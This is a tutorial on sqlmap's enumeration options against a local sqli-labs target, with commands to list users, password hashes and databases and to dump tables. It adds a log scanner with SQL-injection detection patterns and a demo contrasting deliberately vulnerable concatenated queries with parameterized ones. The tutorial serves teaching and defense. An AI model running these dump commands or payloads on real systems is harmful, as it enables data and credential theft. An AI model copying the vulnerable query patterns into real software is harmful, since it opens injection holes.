One. sqlmap retrieves DBMS information

Obtain the back-end database banner
Parameter: --banner or -b

Get the current database name
Parameter: --current-db

Get the hostname
Parameter: --hostname

Detect whether the current user is the database administrator
Parameter: --is-dba

List users and their password hashes: sqlmap first lists the users, then lists each user's password hash values.
Parameter: --passwords

Get all DBMS users
Parameter: --users

Enumerate DBMS privileges
Parameter: --privileges

Use this feature when the current user has permission to read the system tables of the database management system that hold user information; these tables also record each user's privileges. From the output you can determine which users hold administrator privileges.

To enumerate the privileges of specific users only, use the parameter "-U" to specify the user; "CU" can be used to refer to the current user.
python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --privileges -U root
Two. sqlmap enumerates database information

List database names
Parameter: --dbs

List the tables of a database
Parameter: --tables, with -D <database name> to specify a particular database
python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security --tables

Enumerate the columns of a table
Parameter: --columns, with -T <table name> to specify a particular table
python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -T users --columns

Enumerate the data values
Parameter: --dump
python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -T users --columns --dump

Enumerate schema information
Parameter: --schema
This option lets the user list the schema of the database management system. The schema listing contains all databases, tables, columns and triggers, together with their respective types. Likewise, the parameter --exclude-sysdbs excludes the system databases.

Parameter: --exclude-sysdbs, exclude the system databases
Three. sqlmap retrieves the number of rows in a table

If you want to know the number of entries in a table, use this parameter.
Parameter: --count
python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --count -D security

sqlmap retrieves a range of data records
Parameters: --start and --stop; --start 1 --stop 3 returns the first three records of the current database table.
python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --count -D security --tables --start 1 --stop 3 --dump

sqlmap restricts the retrieved data with a condition
Parameter: --where
python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --count -D security -T users --where='id>2' --dump
Four. sqlmap brute-forces data names

Brute-force table names
Parameter: --common-tables
python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --common-tables
In some situations --tables cannot list the table names of a database, for example:
1. MySQL versions below 5.0 have no information_schema database
2. The database user's privileges are too low to read the table names
Five. sqlmap retrieves all information

Retrieve and return all information
Parameter: -a or --all
python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -a
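Every enumeration step in sections One through Five reaches the web application as a crafted value of the injected parameter (here `id`), so the defender's vantage point is the web server's access log. The following Python snippet is an added example, not part of the original post and not sqlmap's own code: it parses constructed combined-format access-log lines, URL-decodes each query parameter, and flags values that carry fragments typical of enumeration traffic, such as `information_schema` (the catalog that table and schema listing reads on MySQL 5.0+, as noted in section Four), `UNION SELECT`, tautologies like `AND 1=1`, and a trailing SQL comment. The log lines, the pattern list and the field names are all constructed assumptions; the pattern list is deliberately small and is meant to be tuned to the application.

```python
import re
import urllib.parse
from collections import Counter

# Constructed sample access-log lines in Apache/nginx "combined" format (not real traffic).
# Source addresses, timestamps and user agents are made up for the example.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli/Less-1/?id=1%27%20AND%201%3D1--%20- HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli/Less-1/?id=-1%27%20UNION%20SELECT%20table_name%2CNULL%2CNULL%20FROM%20information_schema.tables--%20- HTTP/1.1" 200 733 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli/Less-1/?id=2 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
"""

# Fields of the combined log format that the scanner needs: client IP, request path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Assumed pattern list; each entry is (label, regex applied to the decoded parameter value).
SUSPICIOUS = [
    ("union_select", re.compile(r"\bunion\b[\s/*]+(?:all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("tautology", re.compile(r"\b(?:and|or)\b\s+\d+\s*=\s*\d+", re.I)),
    ("comment_tail", re.compile(r"--[\s-]*$|#\s*$")),
]


def scan(log_text):
    """Return one finding per suspicious parameter value: {ip, param, value, hits}."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        query = urllib.parse.urlsplit(m.group("path")).query
        # parse_qs percent-decodes values, so the regexes see the SQL text the app would see
        for param, values in urllib.parse.parse_qs(query, keep_blank_values=True).items():
            for value in values:
                hits = [label for label, rx in SUSPICIOUS if rx.search(value)]
                if hits:
                    findings.append(
                        {"ip": m.group("ip"), "param": param, "value": value, "hits": hits}
                    )
    return findings


def per_source_counts(findings):
    """Count flagged requests per client IP; bursts from one source point to automated enumeration."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f['ip']} param={f['param']} hits={','.join(f['hits'])} value={f['value']!r}")
    print("flagged requests per source:", dict(per_source_counts(results)))
```

In the constructed sample only the two requests from 10.0.0.9 are flagged; the benign `id=1` and `id=2` lookups pass through untouched. Matching on the decoded value rather than the raw URL matters, because the same payload can be percent-encoded in several ways.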
Six. SQL injection principle

6.1 Introduction to SQL injection
SQL injection occurs when a web application does not validate the legitimacy of user-supplied data and passes attacker-controllable parameters from the front end into a back-end database query; the attacker can then construct different SQL statements to carry out arbitrary database operations.

6.2 Two conditions must be met for a SQL injection vulnerability to arise
- The parameter is controllable by the user
- The parameter is brought into a database query: it is concatenated into the SQL statement and passed to the database for execution

6.3 Harm of SQL injection
- Sensitive information in the database is disclosed
- Web pages are tampered with
- The database is maliciously modified
- The server is remotely controlled
6.4 SQL injection classification

According to the SQL data type at the injection position, injection can be divided into two types: numeric injection and string injection.
6.5 Causes of SQL injection
- Data and code are not strictly separated
- Parameter data submitted by the user is brought into a SQL command without adequate checks and filtering, changing the original "semantics" of the SQL command, which the database then executes successfully
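Sections 6.4 and 6.5 together describe the root cause: a user-controlled value is spliced into the SQL text, so at a numeric position (`WHERE id=...`) or a string position (`WHERE username='...'`) the database parses that value as code. The following Python example is added here and is not part of the original post: it builds a small constructed SQLite table (the names and passwords are made up), shows the two vulnerable query shapes beside their hardened forms, and demonstrates that binding the value as a parameter keeps data and code separate, so a tautology payload that returns every row from the concatenated query returns nothing from the parameterized one. The function and table names are assumptions made for the example.

```python
import sqlite3


def make_db():
    """Constructed in-memory sample table; the rows are made up for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "pw-alice"), (2, "bob", "pw-bob"), (3, "carol", "pw-carol")],
    )
    return conn


# --- Vulnerable: data and code are not separated (section 6.5); the parameter becomes SQL text.

def lookup_by_id_vulnerable(conn, user_id):
    # Numeric injection position (section 6.4): no quotes around the value.
    sql = "SELECT id, username FROM users WHERE id=" + user_id
    return conn.execute(sql).fetchall()


def lookup_by_name_vulnerable(conn, name):
    # String injection position (section 6.4): the value sits inside single quotes.
    sql = "SELECT id, username FROM users WHERE username='" + name + "'"
    return conn.execute(sql).fetchall()


# --- Hardened: the value is bound as a parameter; the DBMS never parses it as SQL.

def lookup_by_id_safe(conn, user_id):
    try:
        uid = int(user_id)  # a numeric position accepts only an integer
    except (TypeError, ValueError):
        return []  # reject anything that is not a number instead of building SQL from it
    return conn.execute("SELECT id, username FROM users WHERE id=?", (uid,)).fetchall()


def lookup_by_name_safe(conn, name):
    # Bound as a string value: quotes and keywords inside it have no SQL meaning.
    return conn.execute("SELECT id, username FROM users WHERE username=?", (name,)).fetchall()


def demo():
    """Row counts returned for the same tautology inputs by each variant."""
    conn = make_db()
    return {
        "numeric_vulnerable": len(lookup_by_id_vulnerable(conn, "1 OR 1=1")),
        "numeric_safe": len(lookup_by_id_safe(conn, "1 OR 1=1")),
        "string_vulnerable": len(lookup_by_name_vulnerable(conn, "x' OR '1'='1")),
        "string_safe": len(lookup_by_name_safe(conn, "x' OR '1'='1")),
    }


if __name__ == "__main__":
    for variant, rows in demo().items():
        print(f"{variant}: {rows} row(s)")
```

The same inputs that make the concatenated queries return all three rows (the "semantics" of the statement changed, as 6.5 puts it) are handled by the parameterized versions as plain values: the numeric one is rejected by the type check and the string one simply matches no username.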